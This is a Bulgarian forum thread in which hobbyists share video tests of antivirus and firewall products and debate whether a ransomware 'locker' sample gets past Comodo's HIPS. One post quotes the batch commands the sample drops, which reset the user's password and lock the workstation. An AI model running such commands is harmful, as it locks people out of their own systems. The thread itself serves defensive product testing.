Премини към съдържанието
Форумът в приложение

По-лесно сърфиране. Научи повече.

Kaldata.com - Форуми

Приложение на форума на цял екран с push известия, значки и други.

За да инсталирате това приложение на iOS и iPadOS
  1. Докоснете Иконата за споделяне в Safari
  2. Превъртете менюто и докоснете Добавяне към началния екран.
  3. Докоснете Добавяне в горния десен ъгъл.
За да инсталирате това приложение на Android
  1. Докоснете менюто с 3 точки (⋮) в горния десен ъгъл на браузъра.
  2. Докоснете Добавяне към началния екран или Инсталиране на приложение.
  3. Потвърдете, като докоснете Инсталиране.

Добре дошли!

Добре дошли в нашите форуми, пълни с полезна информация. Имате проблем с компютъра или телефона си? Публикувайте нова тема и ще намерите решение на всичките си проблеми. Общувайте свободно и открийте безброй нови приятели.

Моля, регистрирайте се за да публикувате тема и да получите пълен достъп до всички функции.

Самостоятелни видео тестове (Solo video tests) на програми в защита-част3

Featured Replies

Test Comodo: http://dox.bg/files/dw?a=d402817c27

• Отговори 2,1k
  • Прегледи 133,8k
  • Създадено
  • Последен отговор

Лщбителски, ОК, вижте RIS, ужас... Тодоре той Хитман блокира чак.... Разглеждането на заразите заема по-голяма част от времето на клипа от самия тест...

Само безплатна свястна програма за запис не можах да намеря.Но това не е проблем. :P

CamStudio 2.7 има полезна опция за заключване на потоците за да не стане разминаване на звук и картина или Debut Screen Capture, но пък тя е пълна с реклами.

Bandicam при мен за съжаление товареше много процесора над допустимото (аз я тествах веднага след като Uriel се разбра а автора и да ми прати ключ) и се наложи да я деинсталирам...май това трябва да се докладва, но ако Uriel позволи ще ти пратя ключа, който ми бе подарен за да я тестваш - може да ти хареса. :)

Само безплатна свястна програма за запис не можах да намеря.Но това не е проблем. :P

Тези пробва ли ги?

http://www.webresourcesdepot.com/10-free-screen-recording-softwares-for-creating-attractive-screencasts/

Една онлайн

http://screencastle.com/

Иска Java.

CamStudio 2.7 има полезна опция за заключване на потоците за да не стане разминаване на звук и картина или Debut Screen Capture, но пък тя е пълна с реклами.

Bandicam при мен за съжаление товареше много процесора над допустимото (аз я тествах веднага след като Uriel се разбра а автора и да ми прати ключ) и се наложи да я деинсталирам...май това трябва да се докладва, но ако Uriel позволи ще ти пратя ключа, който ми бе подарен за да я тестваш - може да ти хареса. :)

Прати му го  ;)

Ще имам с какво да се занимавам следобяд.Че и нямам много работа.

Хубава и лека, но платена и прави доста големи файлове.Предполагам има настройки за смаляване.

Ключета има, но на лични.

http://mirillis.com/en/products/action.html

Done! :) Да му да свърши поне на него работа. :)

Вярно натоварва, а преди беше лека.

Взема да му пиша.Аз я ползвам за игри. ;)

Единствената която си заслужава е FastStone Capture , много лесно става и безплатна :clown:

• 2 седмици по-късно...

На първия архив Panda Cloud

Аваст ...Трябва да решаваш и понеже в повечето случаи показва в пясъчника, че не разпознава зловреден код пуснах един.

test2 само проверка на архива.

http://youtu.be/w7N4gTC48Dk

Test URIEL
Пропуснатите от Касперски след разхивиране и сканиране,бяха стартирани. Проверска следтова с МВАМ и Hitman Pro прилагам също.Логовете на Касперски също! Налице е фалшиво засичане от Икарус на файл от папката в SD

http://youtu.be/1p8D3vPE9vQ

Без разкази от криптата!!! 

Редактирано от nikssi (преглед на промените)

Какво доказваш като и един тест не можем да направим?

Какво точно имаш вредвид? Аз не съм с претенции,че мога нещо. Направих каквото можах.

Не говоря за теб.Само ти направи нещо свястно, за което ти благодаря.

Едно време беше друго.

И не на последно място - блокира locker-a, който проби хипса на Comodo 5/6.

Пробил го е на 36 срещу 37 февруари :clown:

При Комодо 5 трябва само една единствена настройка за да се справи с locker-a

COMODO Firewall 5.10 vs Locker

А при Комодо 6 още в бета стадий се справя с locker-a и без допълнителни настройки

COMODO Firewall 6 Beta vs Locker

Не зная къде си гледал филма че Комодо се дъни с locker-ите :wub:

Пробил го е на 36 срещу 37 февруари :clown:

При Комодо 5 трябва само една единствена настройка за да се справи с locker-a

COMODO Firewall 5.10 vs Locker

А при Комодо 6 още в бета стадий се справя с locker-a и без допълнителни настройки

COMODO Firewall 6 Beta vs Locker

Не зная къде си гледал филма че Комодо се дъни с locker-ите :wub:

Ти явно си спал по-това време! :D

http://www.kaldata.com/forums/topic/200395-подпомагане-на-ав-програмите-с-дефиницииоткри/?p=2521475

Uriel може да потвърди за пробива...писал съм и във форума...но не обърнаха внимание, защото файла отдавна е в дефинициите на всички AV.

Но пробива си е факт!

И не - не говорим за GpCode, а за съвсем норлален ransomware - който те log-off-ва и ти сменя паролата за да не можеш да се логнеш наново...трябва да се занулява после чрез Hiren's Boot CD или подбен инструментариум!

И разбира се, че защитата на дяловете бяха включени в "Защитени файлове и папки".

Намери си файла - има го по-назад и си тествай сам...аз пробвах всички възможни настройки без успех...а го натегнах доста здраво.

Скоро ще тествам и на реалната машина с 7. Но на XP се пропука, за разлика от PrivateFirewall-a!

http://www.kaldata.com/forums/topic/200395-подпомагане-на-ав-програмите-с-дефиницииоткри/?p=2521475

Uriel може да потвърди за пробива...писал съм и във форума...но не обърнаха внимание, защото файла отдавна е в дефинициите на всички AV.

Но пробива си е факт!

И не - не говорим за GpCode, а за съвсем норлален ransomware - който те log-off-ва и ти сменя паролата за да не можеш да се логнеш наново...трябва да се занулява после чрез Hiren's Boot CD или подбен инструментариум!

И разбира се, че защитата на дяловете бяха включени в "Защитени файлове и папки".

Намери си файла - има го по-назад и си тествай сам...аз пробвах всички възможни настройки без успех...а го натегнах доста здраво.

Скоро ще тествам и на реалната машина с 7. Но на XP се пропука, за разлика от PrivateFirewall-a!

Да пробива го ;)

Но пробива си е факт!

Дори с настройки по подразбиране не виждам въпросния файл да пробива HIPS-а на Комодо 5

Comodo 5.10 vs LOCK.exe

Въпросния файл създава този bat файл който изпълнява следните команди

@shift

@echo off

net user %username% "00001"

RUNDLL32.exe USER32.dll,LockWorkStation

Ако е включен родителския контрол на Комодо , няма въпроси при стартиране на файла и няма пробив в защитата.

Знам какво създава файла, но дропнатия файл не се засича от HIPS-a на COMODO като файл или процес!

Не ползвам нито sandbox, нито родителски контрол (макар не виждам второто какво ще помогне след като файла не се опитва да смени настройките на Comodo, а опцията за защита на конфигурацията с парола е точно да му пази настройките). Но ще го тествам и така - щом казваш! Това че предпазва компютъра чрез дефиницията на антивирусната програма или чрез sandbox-a не означава, че HIPS-a не е пробит.

Напротив - пробит е. И дори на параноични настройки да показва, че файла се опитва да комуникира с cmd.exe, net.exe, net1.exe, rundll32.exe, user32.dll - в предупрежденията се споменава, че може да се позволят заявките, защото са безопасни...но това би объркало дори напредналите потребители. Не засече дори ключа (дори след като го вкарах в защутените регистри) - HKLM.......Command Processor...

Така че моля те - Try again later! :)

Писали сме тук:

http://forums.comodo.com/empty-t93703.45.html

И чакай - защо даваш отказ на файла до CMD? Нали е легитимна заявка - няма съобщение с червено, което да ти подскаже, че е зловреден!

То аз така мога да блокирам още достъпа на explorer.exe до него след първоначалното му стартиране и пак ще ме опази...не е там въпроса!

Знам какво създава файла, но дропнатия файл не се засича от HIPS-a на COMODO като файл или процес!

Не ползвам нито sandbox, нито родителски контрол (макар не виждам второто какво ще помогне след като файла не се опитва да смени настройките на Comodo, а опцията за защита на конфигурацията с парола е точно да му пази настройките). Но ще го тествам и така - щом казваш! Това че предпазва компютъра чрез дефиницията на антивирусната програма или чрез sandbox-a не означава, че HIPS-a не е пробит.

Напротив - пробит е. И дори на параноични настройки да показва, че файла се опитва да комуникира с cmd.exe, net.exe, net1.exe, rundll32.exe, user32.dll - в предупрежденията се споменава, че може да се позволят заявките, защото са безопасни...но това би объркало дори напредналите потребители. Не засече дори ключа (дори след като го вкарах в защутените регистри) - HKLM.......Command Processor...

Така че моля те - Try again later! :)

Писали сме тук:

http://forums.comodo.com/empty-t93703.45.html

И чакай - защо даваш отказ на файла до CMD? Нали е легитимна заявка - няма съобщение с червено, което да ти подскаже, че е зловреден!

То аз така мога да блокирам още достъпа на explorer.exe до него след първоначалното му стартиране и пак ще ме опази...не е там въпроса!

Нали видя на клипа че е с настройки по подразбиране.

Къде видя на клипа че има антивирус или включен Sandbox ?! В случая HIPS-а не е пробит , вижда се съвсем ясно.

Нали си наясно че въпросния файл не пипа по регистрите та се занимаваш с тях ?! :clown:

Инглишмен , блокирам достъпа на LOCK.exe до cmd.exe защото

Публикувано изображение

Редактирано от Мохикан. (преглед на промените)

Архивирана тема

Темата е твърде стара и е архивирана. Не можете да добавяте нови отговори в нея, но винаги можете да публикувате нова тема, в която да продължи дискусията. Регистрирайте се или влезте във вашия профил за да публикувате нова тема.

Разглеждащи това в момента 0

• Няма регистрирани потребители разглеждащи тази страница.

Дарение

• Подкрепи съществуването на форума - направи дарение
    25%
    Дарени 252.69 EUR от нужните 1,000.00 EUR

Бюлетин

Получавайте известие, когато има важна промяна или новина свързана с форума.

Профил

Навигация

Търсене

Търсене

Конфигуриране на push известия в браузъра

Chrome (Android)
  1. Докоснете иконата на катинар до адресната лента.
  2. Докоснете Разрешения → Известия.
  3. Променете предпочитанията си.
Chrome (Desktop)
  1. Кликнете върху иконата на катинар в адресната лента.
  2. Изберете Настройки на сайта.
  3. Намерете Известия и коригирайте предпочитанията си.